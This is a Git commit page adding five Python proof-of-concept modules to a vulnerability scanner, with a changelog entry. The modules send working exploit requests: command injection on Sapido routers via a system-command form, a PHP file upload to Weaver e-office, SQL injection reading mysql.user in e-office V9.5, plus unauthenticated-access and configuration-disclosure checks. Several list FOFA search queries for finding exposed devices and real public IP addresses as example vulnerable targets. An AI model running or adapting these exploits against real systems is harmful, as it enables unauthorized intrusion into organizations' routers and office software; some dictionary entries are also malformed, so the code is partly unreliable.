openx-org/BLEN
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

2.23.0

Browse Source
This commit is contained in:
莱昂纳多阁下
2022-01-21 09:38:47 +08:00
parent 8a6bd53d07
commit aadd14b056
6 changed files with 394 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
docs/CHANGELOG.md
View File

@@ -699,6 +699,16 @@
> 新增了对DNS Log平台--Ceye的支持oFx现已支持无回显漏洞的检测具体细节见coding > 新增了对DNS Log平台--Ceye的支持oFx现已支持无回显漏洞的检测具体细节见coding
## version 2.23.0
------------------
> 新增POC
* ``MC573未授权访问``
* ``sapido BRC70n路由器远程代码执行漏洞``
* ``泛微-e-cologyV9信息泄露``
* ``泛微E-office V9.5 SQL注入漏洞``
* ``泛微e-office存在前台文件上传漏洞``
``` ```
=============== ===============
|以上为当前版本| |以上为当前版本|

75
poc/MC573/MC573_Unauth_Access/poc.py Normal file
View File

@@ -0,0 +1,75 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-12", # POC创建时间
"UpdateDate" : "2022-01-12", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "MC573未授权访问", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "MC573未授权访问", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
IKO MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作
""", # 漏洞简要描述
"fofa-dork":"""
"MC573"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
# timeout = 10
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "MC573" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

72
poc/Sapido/Rce_sapido_BRC70n/poc.py Normal file
View File

@@ -0,0 +1,72 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-10", # POC创建时间
"UpdateDate" : "2022-01-10", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "BR270n-v2.1.03,BRC76n-v2.1.03,GR297-v2.1.3,RB1732-v2.0.43", # 漏洞应用版本
"VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
app="sapido-路由器"
""", # fofa搜索语句
"example" : "http://122.116.238.251:1080", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/boafrm/formSysCmd" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "application/x-www-form-urlencoded",
}
data = "sysCmd=ifconfig&apply=Apply&submit-url=%2Fsyscmd.htm&msg="
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,headers = headers , data=data,proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code ==200 and "Link encap:Ethernet" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

77
poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py Normal file
View File

@@ -0,0 +1,77 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-1-10", # POC创建时间
"UpdateDate" : "2022-1-10", # POC创建时间
"PocDesc" : """
这个API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口/api/ec/dev/app/test
""", # POC描述写更新描述没有就不写
"name" : "泛微-e-cologyV9信息泄露", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "泛微-e-cology", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
可以获取到响应的ec_id值和对应的IP泛微移动管理平台的地址
""", # 漏洞简要描述
"fofa-dork":"", """
app="泛微-EOffice"
""" # fofa搜索语句
"example" : "http://106.75.133.16:9000/api/ec/dev/app/test", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
timeout = 10
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/api/ec/dev/app/test" # url自己按需调整
# date="command1=shell:ifconfig| dd of=/tmp/a.txt"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
if req.status_code == 200 and "ec_id" and "ec_url" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

85
poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py Normal file
View File

@@ -0,0 +1,85 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
import re
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-1-10", # POC创建时间
"UpdateDate" : "2022-1-10", # POC创建时间
"PocDesc" : """
原POC逻辑过于简单存在大量误报现已优化
""", # POC描述写更新描述没有就不写
"name" : "泛微e-office存在前台文件上传漏洞" , # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "泛微-EOffice", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""" , # 漏洞简要描述
"fofa-dork":"" , """
app="泛微-EOffice"
""" # fofa搜索语句
"example" : "http://219.153.106.177:81/", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
timeout = 10
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url自己按需调整
# date="command1=shell:ifconfig| dd of=/tmp/a.txt"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
data = """Content-Type: multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff
--12f83ada5e3c205e29da579b538944ff
Content-Disposition: form-data; name="upload_quwan"; filename="test.php4"
Content-Type: application/octet-stream
<?php echo xss;?>
--12f83ada5e3c205e29da579b538944ff
"""
try:
"""
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动
"""
req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False)
result = re.match("\[\d,\".+\",\d{10},\"\.\"\]",req.text.strip())
if req.status_code == 200 and result != None:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

75
poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py Normal file
View File

@@ -0,0 +1,75 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-15", # POC创建时间
"UpdateDate" : "2022-01-15", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "泛微E-office V9.5 SQL注入漏洞", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "泛微E-Office", # 漏洞应用名称
"AppVersion" : "泛微 E-Office V9.5 20211208", # 漏洞应用版本
"VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
app="泛微-EOffice"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
# timeout = 10
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/building/subject/tables/json.php" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "application/x-www-form-urlencoded",
}
data = "tfs=mysql.user--+|1|"
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,headers = headers , data=data, proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "[\"root\"]" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()